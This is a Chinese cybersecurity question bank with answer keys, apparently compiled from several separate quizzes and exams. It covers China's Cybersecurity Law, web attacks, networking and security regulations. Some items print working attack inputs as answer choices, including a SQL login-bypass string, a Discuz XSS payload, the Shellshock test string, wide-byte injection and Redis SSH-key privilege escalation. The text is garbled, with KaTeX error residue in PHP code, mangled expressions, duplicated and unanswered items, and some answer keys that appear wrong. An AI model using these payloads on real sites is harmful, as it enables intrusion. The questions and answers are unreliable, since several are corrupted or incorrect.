C、 保密性

D、 可用性

标准答案: B

23、在网络安全法立法中,网络运营者不包括以下哪个?()

A、 网络所有者

B、 网络管理者

C、 网络使用者

D、 网络服务提供者

标准答案: C

24、关于个人信息,网络安全法采用的身份识别说,这个方法借鉴的那个国家组织立法?()

A、 欧盟

B、 美国

C、 俄罗斯

D、 联合国

标准答案: A

25、以下那条规定国家在网络安全领域作用与职能?()

A、 十八条

B、 十九条

C、 二十条

D、 二十一条

标准答案: A

26、网络运行安全主要涉及几个层次?()

A、 1

B、 2

C、 3

D、 4

标准答案:

27、网络运行安全的一般性要求由多少条法规规定?()

A、 5

B、 10

C、 15

D、 20

标准答案: C

28、我们在网络运行安全领域所采取的基本制度是网络安全等级保护制度。

A、 是

标准答案: A

29、网络安全保护义务具体有几项?()

A、 5

B、 4

C、 3

D、 2

标准答案: A

30、网络产品服务具有收集用户信息功能的,其提供者不需要向用户明示。

A、 对

B、 错

标准答案: B

31、国家网信部对关键基础设施一系列规定包含几项?()

A、 4

B、 3

C、 2

D、 1

标准答案: A

32、网安法第三十三条反应的是那个层面的安全?()

A、 技术要素

B、 组织管理

C、 在线内容

D、 运行维护

标准答案: A

33、关键基础设施的运营者还应该履行几项重要的安全保护义务?()

A、 3

B、 4

C、 5

D、 6

标准答案: C

34、网安法第多少条规定了具有网络安全监督管理职责的部门对信息进行保密?()

A、 43

B、 44

C、 45

D、 46

标准答案: C

35、任何个人组织发送的电子信息可以包含任意信息。

A、 对

B、 错

标准答案: B

36、以下那十条详细规定了网络运营者在网络保护中应当承担的义务和责任?()

A、 第40-50条

B、 第45-55条

C、 第50-60条

D、 第55-65条

标准答案: A

37、以下哪项不是网络运营收集个人信息的原因?()

A、 合法

B、 正当

C、 必要

D、 盈利

标准答案: D

38、网络安全事件发生风险增大时,()级以上政府需要采取措施?

A、 县级

B、 市级

C、 省级

D、 中央级

标准答案: C

39、网络安全法中没有规定对应违法事件的刑事责任。

A、 对

B、 错

标准答案: B

40、网络安全法中设立的最高返款金额为()万元。

A、 一

B、 十

C、 百

D、 千

标准答案: C

41、网络安全法中规定:人员违法相关单位也可能会追究刑事责任。

A、 是

标准答案: A

42、不是所有的网络犯罪都会追究单位责任。

A、 对

B、 错

标准答案: B

43、非法利用信息网络罪中同时违法该条两款行为时,会受到怎样的惩罚?()

A、 两项从重处罚

B、 两项数罪并罚

C、 两项从轻处罚

D、 两项逐个处罚

标准答案: A

44、以下那组是网络安全法关于技术要素层面的安全规定?()

A、 第64,67,68,70条

B、 第64,69,70,73条

C、 第60,62,65,75条

D、 第59,61,63,75条

标准答案: C

45、民法总则是第()次对于数据与网络虚拟财产的法律属性进行规定。

A、 一

B、 二

C、 三

D、 四

标准答案: A

46、国家网信部门规定的重要规定有()项。

A、 6

B、 7

C、 8

D、 9

标准答案: D

47、最高司法机关的规范文件共有()项

A、 3

B、 4

C、 5

D、 6

标准答案: C

48、根据网信部规定,通讯工具开通公众账号必须满足()的要求。

A、 缴费制

B、 公益制

C、 实名制

D、 守信制

标准答案: C

49、国家对于打击电信诈骗案的引发点是()。

A、 雪梨枪案

B、 北京千万电信诈骗案

C、 8·19徐玉玉电信诈骗案

D、 K8社工库侵犯公民个人信息案

标准答案: C

50、对于贩卖公民通信记录等重要信息入罪门槛是()条

A、 5000

B、 50000

C、 100000

D、 1000000

标准答案: A

1、通过____分析攻击事件能得到更准确的信息。

A、 文件修改时间

B、 IDS告警日志

C、 网站后门

D、 来源ip

标准答案: B

2、下列哪项不是针对内网入侵及告警分析的思路?

A、 基于IP的分析

B、 基于时间的分析

C、 基于告警级别的分析

D、 基于业务的分析

标准答案: D

3、下列哪项不属于DDOS的攻击方式?

A、 通过使网络过载来干扰甚至阻断正常的网络通讯

B、 通过向服务器提交大量请求,使服务器超负荷

C、 用户访问网站新功能

D、 通过向目标机发送ping包,造成网络堵塞或资源耗尽

标准答案: C

4、下列哪项不是JBoss的JAVA反序列化漏洞的防御方案?

A、 在源码中打入官方最新patch

B、 限定可以连接到JBoss的IP

C、 对JBoss专有用户,设置高权限

D、 在jmx-invoker-service.xml中开启权限验证

标准答案: C

5、下列哪项不能有效防御海量DDOS攻击?

A、 利用dns实现均衡,并加强dns自身防护能力

B、 4层负载均衡之前,构建ddos防护系统

C、 在4层与7层之间均实现HTTP Flood防护

D、 在用户请求过多时,限制所有用户请求

标准答案: D

6、下列哪项不是web应用中使用cookie会话机制可能造成的风险?

A、 会话劫持

B、 造成缓冲区溢出

C、 cookie注入

D、 信息泄露

标准答案: B

7、下列哪项不是Redis未授权访问缺陷解决方案?

A、 尽可能不对公网直接开放 SSH 服务

B、 在内网中使用简单的密码,方便测试

C、 对 redis 访问启用密码认证,并且添加 IP 访问限制和修改redis的默认端口6379

D、 禁止使用 root 权限启动 redis 服务

标准答案: B

8、下列哪项不是可移动终端程序可能受到的攻击?

A、 对用户数据请求进行加密

B、 拒绝服务:是合法用户无法获得资源

C、 破坏或修改数据

D、 泄露用户或主机的机密信息

标准答案: A

9、下列对于redis提权的说法错误的是?

A、 redis在root权限下运行,导致了可提权

B、 如果目标机ssh未启用公钥登录,则可能提权失败

C、 提权的过程是将redis公钥保存在redis的配置文件中,然后将配置文件保存在root目录下的.ssh目录,进而使用私钥登录进行root用户

D、 如果设置了redis的访问密码就不会有被提权风险

标准答案: D

10、下列关于TCP三次握手的描述错误的是?

A、 为了提供可靠的数据传输,所以需要三次握手协议

B、 tcp的数据传输是在完成了三次握手协议之后才开始的

C、 在三次握手协议中,服务器会维护一个队列,来维持每个客户端与服务器的三次握手协议的进行

D、 cc攻击就是利用了tcp三次握手协议来发起的一种DDOS攻击

标准答案: D

11、下面关于CC攻击的描述正确的是?

A、 频繁访问需要占用大量系统资源的服务,导致系统资源耗尽从而达到拒绝服务的目的

B、 利用服务应用本身缺陷导致程序崩溃停止服务

C、 利用网络协议本身的运作机制构造一场数据包,导致服务端口阻塞

D、 利用大带宽流量和海量连接数封堵服务端口

标准答案: A

12、下面对于synflood攻击的原理描述正确的是?

A、 频繁访问需要占用大量系统资源的服务,导致系统资源耗尽从而达到拒绝服务的目的

B、 利用服务应用本身缺陷导致程序崩溃停止服务

C、 利用tcp/ip协议的3次握手机制,伪造无效IP,造成服务器长期等待握手响应无法释放资源造成服务器拒绝服务

D、 利用大带宽流量和海量连接数封堵服务端口

标准答案: C

13、下列对于PHP防sql注入的方法描述错误的是?

A、 PHP的PDO技术,通过参数化查询将参数与查询语句分别执行,从根本上杜绝sql注入

B、 当设置magic_quotes_gpc=on的时候,PHP会对用户通过任何方式传来的所有参数进行Addslashes()过滤

C、 Intval()将变量转换成整形变量,对于数字型注入具有很好的防御效果

D、 Addslashes(),对参数进行单引号、双引号、反斜杠以及NULL进行转义

标准答案: B

14、下列对于MD5加密与解密的描述错误的是?

A、 MD5加密是不可逆的

B、 MD5可以用来加密数据,防止信息泄露,需要使用的时候可以解密获取

C、 MD5加密目前只能通过枚举法来破解

D、 MD5使用的是HASH算法,在计算过程中可能有部分信息丢失

标准答案: B

15、下列对于redis未授权访问漏洞的描述正确的是?

A、 redis系统默认弱口令,并且暴漏在公网上

B、 redis存在未授权访问漏洞,需要升级打补丁

C、 redis默认安装没有访问控制,需要修改配置文件启用访问限制并且设置密码

D、 操作系统漏洞,由于系统安全配置不当导致redis未授权访问

标准答案: C

16、白帽子,在没有经过厂商允许的前提下,进入目标主机并下载了大量敏感信息,没有使用敏感数据谋取财富,并且上交到漏洞响应平台,这样的行为是否违法?

A、 违法

B、 不违法

标准答案: A

17、Addslashes()函数不对____字符进行转义。

A、 单引号

B、 双引号

C、 NULL

D、 斜杠

标准答案: D

18、下列不属于MVC架构中视图的作用的是____。

A、 解释模型

B、 发送用户输入给控制器

C、 允许控制器选择视图

D、 选择响应的视图

标准答案: D

19、下列选项关于FTP(File Transfer Protocol)传输方向描述正确的是?

A、 单向传输

B、 双向传输

C、 多方向传输

标准答案: B

20、数据帧往出发送数据时,每帧长度超出____则需要切片。

A、 1000B

B、 1100B

C、 1300B

D、 1500B

标准答案: D

21、synflood(拒绝服务攻击)是基于____协议的。

A、 TCP

B、 UDP

C、 ICMP

D、 IGMP

标准答案: A

22、TCP中RST标志位置1,则表拒绝连接。

A、 正确

B、 错误

标准答案: A

23、下列不属于MVC架构中视图的作用的是?

A、 解释模型

B、 发送用户输入给控制器

C、 允许控制器选择视图

D、 选择响应的视图

标准答案: D

24、CMS通常情况下均基于MVC架构。

A、 正确

B、 错误

标准答案: A

25、下列选项中属于绕过签名验证机制的安卓漏洞是____。

A、 Stagefright漏洞

B、 WebView漏洞

C、 master key漏洞

D、 launchAnyWhere漏洞

标准答案: C

26、下列选项中不能提升密码强度的是____。

A、 不使用弱口令

B、 使用个人身份信息

C、 一定时间段必须更换密码

D、 尽可能增加密码复杂度(大小写字母、数字、特殊字符)

标准答案: B

27、RFID技术窃取银行卡中的信息不包括____。

A、 姓名

B、 身份证号码

C、 银行卡号码

D、 密码

标准答案: D

28、USIM和SIM卡最大的不同是____。

A、 保密信息

B、 IMSI

C、 序列号

D、 内存

标准答案: A

29、威胁情报中情报处理的手段不包括____。

A、 数据挖掘

B、 关联分析、机器学习

C、 情报统一存储

D、 可视化分析、专家分析

标准答案: C

30、云内安全挑战不包括____。

A、 云数据中心内部攻击防御困难

B、 云内性能处理优化

C、 云内部的流量及威胁防护困难

D、 安全的任意扩展、动态部署和迁移·

标准答案: B

31、云数据中的安全策略不包括____。

A、 交换机ACL、可信计算

B、 提高云数据中心的硬件性能

C、 云查杀

D、 云WAF

标准答案: B

32、下列对网络靶场理解不正确的是____。

A、 靶场内有真实个人数据

B、 是一个实验环境

C、 仿真真实网络的各种行为

D、 根据实战进行设计

标准答案: A

33、下列哪个是机器学习的常用算法?

A、 冒泡排序

B、 关联规则学习

C、 RSA算法

D、 DES算法

标准答案: B

34、白帽子开发的黑客工具在网络传播,被不法分子所利用,造成了严重的后果,那工具的开发者需要承担法律责任吗?

A、 不需要承担法律责任

B、 需要承担法律责任

标准答案: B

35、下列哪一项不是CSRF漏洞可能造成的风险?

A、 开启路由器远程管理功能

B、 信息泄露

C、 缓冲区溢出

D、 XSS攻击

标准答案: C

36、什么是拒绝服务攻击

A、 远程或本地正常的服务停止工作

B、 服务器卡机

C、 蓝屏

D、 网络正常使用

标准答案: A

37、那个协议需要验证并双方效验?

A、 ftps

B、 UDP/IP

C、 UDP

D、 TCP

标准答案: D

38、cc攻击使用的哪一个工具

A、 watch

B、 oclHashcat

C、 burp

D、 TCP/IP

标准答案: A

39、ipconfig /displaydns是什么指令

A、 可以看到机器当前DNS缓存列表

B、 可以看到机器当前IP列表

C、 查看跨域地址

D、 查看路由器地址

标准答案: A

40、还原.net代码混淆工具

A、 lLspy

B、 de4dot

C、 Reflector

D、 uedit32

标准答案: B

41、安卓系统最早起源来于?

A、 Linux

B、 JAVA

C、 C+

D、 .net

标准答案: A

42、4.3安卓系统WEbkit漏洞修补方法

A、 禁止访问

B、 删除代码

C、 关闭接口

D、 去掉空白字符

标准答案: D

43、DedeCMS5.7远程文件包含漏洞中存在变量覆盖漏洞的语句是

A、 foreach($$_trwurdy sd $_k => $_v) k = R u n M a g i c Q u o t e s ( _k = RunMagicQuotes(k=RunMagicQuotes(_v);

B、 foreach($$_trwurdy sd $_k => $_v) ( ((_k) = RunMagicQuotes($_v);

C、 foreach($$_trwurdy sd $_k => $_v) [ [[_k] = RunMagicQuotes($_v);

D、 foreach($$_trwurdy sd $_k => $_v) KaTeX parse error: Expected ‘}’, got ‘EOF’ at end of input: {_k} = RunMagicQuotes($_v);

标准答案: D

44、文件包含分为本地文件包含和远程文件包含

A、 对

B、 错

标准答案: A

45、Discuz使用了以下哪种标记语言??()

A、 Muse

B、 AsciiDoc

C、 BBCode

D、 Textile

标准答案: C

46、以下选项中,Discuz存储型DOM XSS攻击使用的payload正确的是?()

A、 [align=οnmοuseοver=”alert(1)]

B、 [align=”οnmοuseοver=”alert(1)]

C、 [align=”οnmοuseοver=alert(1)]

D、 [align=”οnmοuseοver=“alert(1)”]

标准答案: B

47、通过告警日志分析攻击事件的基本技能不包括以下哪个选项?()

A、 网络协议基础知识

B、 网站架构基础知识

C、 程序代码编写能力

D、 网站常见攻击手段

标准答案: C

48、御剑在进行后台探测时发送的HTTP请求方式是?()

A、 POST

B、 HEAD

C、 GET

D、 OPTIONS

标准答案: B

49、告警信息原始报文中可以看到的信息不包括以下哪个选项?()

A、 攻击者发送的HTTP请求

B、 服务器返回的响应信息

C、 服务器的网络拓扑结构

D、 攻击者使用的IP地址

标准答案: C

50、MYSQL远程登录成功会生成安全审计类告警信息。()

A、 对

B、 错

标准答案: A

1、Web程序中出现以下哪种情况能形成漏洞?()

A、 可控变量进入正常函数

B、 可控变量进入危险函数

C、 不可控变量进入正常函数

D、 不可控变量进入危险函数

标准答案: B

2、以下哪个选项是SQL注入payload中#的作用?()

A、 闭合前面sql语句

B、 闭合后面sql语句

C、 注释前面sql语句

D、 注释后面sql语句

标准答案: D

3、以下哪个选项是PHPCMS中存在SQL注入漏洞的字段?()

A、 Accept

B、 Referer

C、 User-Agent

D、 X-Forwarded-For

标准答案: B

4、在PHPCMS SQL注入漏洞中构造的payload是使用的以下哪种方法?()

A、 insert插入

B、 select查询

C、 group by报错

D、 update更新

标准答案: C

5、insert into语句一次不可以向数据库插入多条数据。

A、 对

B、 错

标准答案: B

6、SQL注入漏洞获取的HTTP_X_FORWARDED_FOR字段对应HTTP请求头中的哪个字段?()

A、 Forwarded

B、 Forwarded_For

C、 X_Forwarded

D、 X_Forwarded_For

标准答案: D

7、在BlueCMS1.6 SQL注入漏洞中构造的payload是使用的以下哪种方法?()

A、 闭合update语句,将敏感数据读取到页面中

B、 构造delete语句,将敏感数据读取到页面中

C、 闭合insert语句,将敏感数据插入到评论表

D、 构造union语句,将敏感数据插入到评论表

标准答案: C

8、XML注入漏洞字段HTTP_RAW_POST_DATA在以下哪种情况下会生成?()

A、 POST发送可识别的MIME类型数据

B、 POST发送不可识别的MIME类型数据

C、 客户端发送GET请求

D、 客户端发送HEAD请求

标准答案: B

9、在xml中,CDATA区段的文本会被xml解析器忽略。

A、 对

B、 错

标准答案: A

10、PHPYun XML注入漏洞构造payload时使用的是哪个SQL关键词?()

A、 update

B、 insert

C、 union

D、 delete

标准答案: C

11、需要如何修改HTTP请求才能触发XML注入漏洞?()

A、 Content-Type:text/html;

B、 Content-Type:application/x-www-form-urlencoded;

C、 Content-Type:text/plain;

D、 Content-Type:text/xml;

标准答案: D

12、在Bash中哪个命令可以将局部变量变成全局变量?()

A、 exec

B、 expand

C、 export

D、 expr

标准答案: C

13、存在远程命令执行漏洞的Bash中输入export v=’() { echo “X”;}; echo “Y”’;bash会输出X。

A、 对

B、 错

标准答案: B

14、以下选项中哪个PHP的函数可以执行系统命令?()

A、 var_dump

B、 request

C、 system

D、 extract

标准答案: C

15、以下哪个PHP函数可以将数据写入文件?()

A、 readfile

B、 fopen

C、 file_put_contents

D、 file_get_contents

标准答案: C

16、PHP中的extract函数的作用是从数组中将变量导入到当前的符号表。

A、 对

B、 错

标准答案: A

17、PHP执行eval(phpinfo())时,会返回什么信息?()

A、 服务器网络配置信息

B、 服务器php配置信息

C、 服务器系统配置信息

D、 服务器硬件配置信息

标准答案: B

18、以下选项中哪种情况可以导致PHP代码执行漏洞?()

A、 用户通过浏览器提交执行命令,客户端没有针对执行函数做过滤

B、 用户通过浏览器提交执行命令,客户端针对执行函数做过滤

C、 用户通过浏览器提交执行命令,服务器端针对执行函数做过滤

D、 用户通过浏览器提交执行命令,服务器端没有针对执行函数做过滤

标准答案: D

19、PHP代码执行漏洞可以调用system函数执行系统命令。

A、 对

B、 错

标准答案: A

20、PHP脚本<?php echo preg_replace(‘/\{\?([^}]+)\}/e’,”$1″,”{?md5(123)}”); ?>会输出什么内容?()

A、 ?md5(123)

B、 {?md5(123)}

C、 202cb962ac59075b964b07152d234b70

D、 {?md5(123)}

标准答案: C

21、Web目录下的upload/test.zip文件通过以下哪种链接可以下载?()

A、 upload/…/test.zip

B、 upload/…/./test.zip

C、 config/…/upload/test.zip

D、 config/././upload/test.zip

标准答案: C

22、Windows平台下的Web目录下的test.php不能通过test.PhP访问。

A、 对

B、 错

标准答案: B

23、PHP执行函数strrpos(“I_love_php.php”,”.php”)会返回什么值?()

A、 7

B、 8

C、 9

D、 10

标准答案: D

24、PHP执行函数strtolower(“PHP”)会返回什么值?()

A、 php

B、 Php

C、 PHp

D、 PHP

标准答案: A

25、PHP执行t e = ( 1 + 2 ) ? 4 : 6 ; 之 后 , te=(1+2)?4:6;之后,te=(1+2)?4:6;,te的值是什么?()

A、 1

B、 2

C、 4

D、 6

标准答案: C

26、以下选项中对”multipart/form-data”的解释不正确的是?()

A、 基础方法是post请求

B、 基础方法是get请求

C、 http协议本身的原始方法不支持multipart/form-data

D、 可用于文件上传时,设置表单的MIME类型

标准答案: B

27、以下哪个选项的内容可以替代SQL语句中的空格?()

A、 /**/

B、 #

C、 –

D、 //

标准答案: A

28、PHP的addslashes函数的作用是什么?()

A、 去除字符串中的预定义字符

B、 将字符串中的预定义字符之前添加反斜杠

C、 将字符串按照预定义字符进行分割

D、 将字符串中的预定义字符替换为空格

标准答案: B

29、mysql数据库使用utf-8字符集可能导致宽字节注入。

A、 对

B、 错

标准答案: B

30、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()

A、 使用PHP的trim函数,字符集使用utf-8

B、 使用PHP的trim函数,字符集使用gbk

C、 使用PHP的addslashes函数,字符集使用utf-8

D、 使用PHP的addslashes函数,字符集使用gbk

标准答案: D

31、以下哪种方式可以防止宽字节注入?()

A、 mysql_query(“set names gbk”)和addslashes()函数结合使用

B、 使用mysql_query(“set names gbk”)设置字符集

C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用

D、 使用mysql_set_charset(“gbk”)设置字符集

标准答案: C

32、以下哪个选项对asp运算符的解释错误?()

A、 <>为不等于

B、 IS判断两个字符串是否相等

C、 XOR为”异或”运算

D、 OR为”或”运算

标准答案: B

33、SQL语句”select * from user where name=’”.n a m e . &quot; ′ a n d p a s s = ′ &quot; . name.&quot;&#x27; and pass=&#x27;&quot;.name.andpass=.pass.”’”如何绕过登录?()

A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456

B、 $name设置值为admin’ and ‘1’=’1 $pass的值为123456

C、 $name设置值为admin’ or ‘1’=’1 $pass的值为123456

D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456

标准答案: C

34、以下选项中哪些措施不能防御CSRF攻击?()

A、 使用一次性Token验证

B、 在HTTP头中自定义属性并验证

C、 全部操作使用POST传递数值

D、 使用复杂度高的验证码

标准答案: C

35、以下哪个函数是作为FLASH与宿主界面JavaScript通信的接口?()

A、 External.call

B、 ExternalConfig.call

C、 ExternalInterface.call

D、 Externalrunning.call

标准答案: C

36、以下哪个选项的内容是JavaScript中的注释符?()

A、 ~

B、 //

C、 *

D、 #!

标准答案: B

37、以下哪个选项对于反射型XSS的描述是错误的?()

A、 可以结合CSRF来利用

B、 攻击代码存储在客户端

C、 攻击代码存储在服务端

D、 可以劫持用户访问链接

标准答案: C

38、以下哪个选项可以成功的设置Web应用浏览器端的Cookie值?()

A、 在浏览器Console中输入document.cookie=“test=123456”

B、 在浏览器Console中输入document.cookie(“test=123456”)

C、 在浏览器地址栏中输入document.cookie=“test=123456”

D、 在浏览器地址栏中输入document.cookie(“test=123456”)

标准答案: A

39、技术流的完整提供测试不包含下面那一项?

A、 勘察探索

B、 监测捕获

C、 错误定位

D、 错误修复

标准答案: D

40、以下哪个选项不属于安全测试的流程?

A、 信息汇总

B、 交互测试

C、 审核验证

D、 项目交接

标准答案: D

41、软件开发安全生产解决方法不包含哪一项?

A、 溯源检测

B、 合规检测

C、 安全检测

D、 应急响应

标准答案: D

42、安全检测需要嵌入到软件开发流程中。

A、 对

B、 错

标准答案: A

43、HTTPS的设计是可以避免下列哪种攻击?

A、 SQL注入攻击

B、 跨站脚本攻击

C、 中间人攻击

D、 暴力破解攻击

标准答案: C

44、同源策略不包含下面那一项?

A、 协议

B、 路径

C、 端口号

D、 域名

标准答案: A

45、哪些设置可以有效的避免cookie的完整性所带来的安全问题?

A、 Shared domain providers

B、 Website development/deployment

C、 Exploration of Cookie Policy Change

D、 HTTPS instead of HTTP

标准答案: D

46、App-web接口检测系统架构的组成包含哪些?

A、 Triggering

B、 Detection

C、 Provenance

D、 Counterattack

标准答案: D

47、App-web接口检测系统使用哪种方法识别APP上的广告?

A、 特征码

B、 接口扫描

C、 机器学习

D、 分类标识

标准答案: A

48、下面哪一项不属于浏览器的防护手段?

A、 沙盒

B、 隔离堆

C、 Httponly

D、 栈cookies

标准答案: C

49、Redis未授权漏洞的根本原因是运维人员安全意识薄弱

A、 对

B、 错

标准答案: A

50、如果服务端IP为192.168.1.1,下列哪项是使用命令手动连接Redis的正确方式?

A、 redis-cli 192.168.1.1

B、 Redis -cli 192.168.1.1

C、 redis cli 192.168.1.1

标准答案: A


二、多选题

1、以下关于对称加密的说法正确的是? ACD

A、

在对称加密中,只有一个密钥用来加密和解密信息

B、

在对称加密中,用到了二个密钥来加密和解密信息,分别是公共密钥和私用密钥

C、

对称加密是一个简单的过程,双方都必需完全相信对方,并持有这个密钥的备份

D、

对称加密的速度非常快,允许你加密大量的信息而只需要几秒钟

Internet的影响越来越大,人们常把它与报纸、广播、电视等传统媒体相比较,称之为(

)。

A、第四媒体

B、交互媒体

C、全新媒体

D、交流媒体

(4选2)网络按通信方式分类,可分为(

)。

A、点对点传输网络

B、广播式传输网络

C、数据传输网

D、对等式网络

下列说法中不正确的是(

)。

A、IP地址用于标识连入Internet上的计算机

B、在Ipv4协议中,一个IP地址由32位二进制数组成

C、在Ipv4协议中,IP地址常用带点的十进制标记法书写

D、A、B、C类地址是单播地址,D、E类是组播地址

一个路由器有两个端口,分别接到两个网络,两个网络各有一个主机,IP地址分别为110.25.53.1和110.24.53.6,子网掩码均为255.255.0.0,请从中选出两个IP地址分别分配给路由器的两个端口(

)。

A、110.25.52.2和110.24.52.7

B、110.24.53.2和110.25.53.7

C、111.25.53.2和111.24.53.7

D、110.25.53.2和110.24.53.7

(4选2)下列说法中属于ISO/OSI七层协议中应用层功能的是(

)。

A、拥塞控制

B、电子邮件

C、防止高速的发送方的数据把低速的接收方淹没

D、目录查询

(4选3)如果发现网络变得很慢,经过观察,发现网络冲突增加很多,以下哪些情况会引起此类故障(

)。

A、电缆太长

B、有网卡工作不正常

C、网络流量增大

D、电缆断路

下列网卡中,属于按照总线类型分类的是(

)。

A、10M网卡、100M网卡

B、桌面网卡与服务器网卡

C、PCI网卡、ISA网卡

D、粗缆网卡、细缆网卡

RIP是(

)协议栈上一个重要的路由协议。

A、IPX

B、TCP/IP

C、NetBEUI

D、AppleTalk

(4选3)下列关于中继器的描述正确的是(

)。

A、扩展局域网传输距离

B、放大输入信号

C、检测到冲突,停止传输数据到发生冲突的网段

D、增加中继器后,每个网段上的节点数可以大大增加

下列属于

10

Base-T中网卡与集线器之间双绞线接法的是(

)。

A、l-l,2-2,3-3,6-6

B、l-3,2-6,3-l,6-2

C、1-2,2-1,3-6,6-3

D、1-6,2-3,3-2,6-l

划分VLAN的方法常用的有(

)、按MAC地址划分和按第3层协议划分3种。

A、按IP地址划分

B、按交换端口号划分

C、按帧划分

D、按信元交换

以太网交换机的最大带宽为(

)。

A、等于端口带宽

B、大于端口带宽的总和

C、等于端口带宽的总和

D、小于端口带宽的总和

某公司位于A市,其分公司位于距A市120公里的B市,总部与分公司之间在上班时间内要经常性地进行大量电子表格传递,则应选择的合理通信连接方式为(

)。

A、普通电话拨号联网

B、光缆快速以太网

C、帧中继

D、星形网

三、填充题(每空1分,共20分)

在下列括号中填入局域网或广域网

)通常为一个单位所拥有,(

)限制条件是传输通道的速率,(

)跨越无限的距离,(

)通常使用广播技术来替代存储转发的路由选择。

虚拟主机服务是指为用户提供(

)、(

)和网页设计制作等服务。

衡量数据通信的主要参数有(

)和(

)。

IP地址11011011,00001101,00000101,11101110用点分10进制表示可写为(

)。

综合布线系统可划分为工作区子系统、骨干线子系统、(

)、管理子系统、(

)和户外子系统。

任何网络都有以下三个要素,即:共享服务、(

)和(

)。

IP地址分配有动态主机分配协议、(

和(

三种IP寻址方式。

防火墙的组成可以表示成(

)+(

)。

认证主要包括实体认证和(

)两大类。

Intranet分层结构包括网络、(

)、应用三个层次。

在TCP/IP网络中,测试连通性的常用命令是(

)。

四、简答题(共40分)

简述通信子网与资源子网分别由哪些主要部分组成,其主要功能是什么。(本题6分)

试辩认以下IP地址的网络类别:(本题10分)

01010000,10100000,11,0101

10100001,1101,111,10111100

11010000,11,101,10000001

01110000,00110000,00111110,11011111

11101111,11111111,11111111,11111111

简述交换机与集线器在工作原理上的区别。(本题6分)

简述为何在网络中路由器通常比网桥有更长的时延。(本题8分)

简述不支持TCP/IP的设备应如何进行SNMP管理。(本题10分)

计算机网络模拟试题答案及评分标准

一、是非题(每题1分,共10分。正确的在括号内划√,错的划×,填入其它符号按错论。)

1.(√)

2.(×)

3.(×)

4.(√)

5.(×)

6.(√)

7.(×)

8.(×)

9.(√)

10.(×)

二、单选题和多选题(每题2分,共30分。除题目特殊说明是多选题外,其他均为单选题。单选题在括号内选择最确切的一项作为答案。)

C

B、D

A

A、B

D

B

B、D

A、B、C

C

B

A、B、C

A

B

C

C

三、填充题(每空1分,共20分)

1.局域网、广域网、广域网、局域网

2.域名注册、服务器空间租用

3.数据通信速率、误码率

4.219,13,5,238

5.水平布线子系统、设备间子系统

6.传输介质、网络协议

7.自动专用IP地址寻址、手工设置

8.过滤器、安全策略

9.消息认证

10.服务

11.PING

四、简答题(共40分)

1.(本题6分)

答:

通信子网负责整个网络的纯粹通信部分,资源子网即是各种网络资源(主机上的打印机、软件资源等)的集合。

通信子网由两个不同的部件组成,即传输线和交换单元。传输介质也称为电路、信道,信道是通信中传递信息的通道,包含发送信息、接收信息和转发信息的设备。传输介质是指用于连接两个或多个网络结点的物理传输电路,例如,电话线、同轴电缆、光缆等。通信信道应包括传输介质与通信设备,它是建立在传输介质之上的。采用多路复用技术时,一条物理传输介质上可以建立多条通信信道。

(本题10分)

答:

01010000,10100000,11,0101

A类

10100001,1101,111,10111100

B类

11010000,11,101,10000001

C类

01110000,00110000,00111110,11011111

A类

11101111,11111111,11111111,11111111

D类

3.

(本题6分)

答:集线器采用“广播模式”工作,很容易产生“广播风暴”,当网络规模较大时性能会收到影响。交换机工作的原理是通过发出请求的端口和目的端口之间相互影响而不影响其他端口。因此交换机能够抑制广播风暴的产生并在一定程度上隔离冲突域。

4.

(本题8分)

答:由于“路由”过程中采用了源地址和目的地址存储/转发的技术,节点存储/转发的时延较大,每个节点都要接收、存储、检错、纠错、转发大量的数据信息,路由表建表、改表和查表工作也会产生节点延迟。这些情况导致路由器的时延较长。

(本题10分)

答:

SNMP要求所有的代理设备和管理站都必须实现TCP/IP。这样,对于不支持TCP/IP的设备,就不能直接用SNMP进行管理。为此,提出了委托代理的概念。

一个委托代理设备可以管理若干台非TCP/IP设备,并代表这些设备接收管理站的查询,实际上委托代理起到了协议转换的作用,委托代理和管理站之间按SNMP协议通信,而与被管理设备之间则按专用的协议通信。


计算机信息系统的使用单位———–安全管理制度。(单选)

A

A.应当建立健全

B.自愿建立

C.可以建立

D.不一定都要建立

未经允许使用计算机信息网络资源的个人,公安机关可以处———的罚款。(单选)

A

A.5000元以下

B.1500元以下

C.15000元以下

D.1000元以下

我国计算机信息系统实行——-保护。(单选)

B

A.主任值班制

B.安全等级

C.责任制

D.专职人员资格

计算机病毒是指能够——–的一组计算机指令或程序代码。(多选)

ABC

A.自我复制

B.破坏计算机功能

C.毁坏计算机数据

D.危害计算机操作人员健康

进行国际联网的计算机信息系统,由计算机信息系统使用单位报————-人民政府公安机关备案。(单选)

B

A.公安部

B.省级以上

C.县级以上

D.国务院

任何组织或者个人违反《中华人民共和国计算机信息系统安全保护条例》的规定,给国家、集体或者他人财产造成损失的,应当依法—————。(单选)

D

A.承担经济责任

B.接受经济处罚

C.接受刑事处罚

D.承担民事责任

公安部在紧急情况下,可以就设计计算机信息系统安全的————-事项发布专项通令。(单选)

D

A.所有

B.偶发

C.一般

D.特定

经营国际互联网业务的单位,有违法行为时,———可以吊销其经营许可证或者取消其联网资格。(单选)

C

A.互联网络管理部门

B.公安机关计算机管理监察机构

C.原发证、审批机构

D.公安机关

——-是全国计算机信息系统安全保护工作的主管部门。(单选)

D

A.国家保密局

B.教育部

C.国家安全部

D.公安部

计算机信息系统,是指由计算机及其相关的和配套的设备、设施(含网络)构成的,按照一定的应用目标和规则对信息进行采集,加工,传输,检索等处理的————。(单选)

D

A.计算机信息系统

B.网络系统

C.计算机系统

D.人机系统

我国计算机信息系统安全保护的重点是维护———等重要领域的计算机信息系统的安全。(多选)

ABD

A.经济建设、国防建设

B.尖端科学技术

C.教育文化

D.国家事务

使用公用帐号的注册者应当加强对公用帐号的管理,建立帐号使用——制度。(单选)

A

A.登记

B.申请

C.收费

D.备案

在计算机信息系统中,以计算机文字表示的,含有危害国家安全内容的信息,是属于———-。(单选)

B

A.计算机污染

B.计算机有害数据

C.计算机破坏性信息

D.计算机病毒

《计算机信息网络国际联网安全保护管理办法》是于——–经国务院批准。(单选)

D

A.1997年12月30日

B.1997年7月1日

C.1997年12月1日

D.1997年12月11日

公安机关计算机管理监察机构应当掌握互联单位、接入单位和用户的备案情况,建立———–,进行备案统计,并按照国家有关规定逐级上报。(单选)

B

A.登记制度

B.备案档案

C.专人负责制度

D.管理制度

16.计算机机房应当符合————和国家有关规定。(单选)

D

A.噪声要求

B.采光要求

C.行业标准
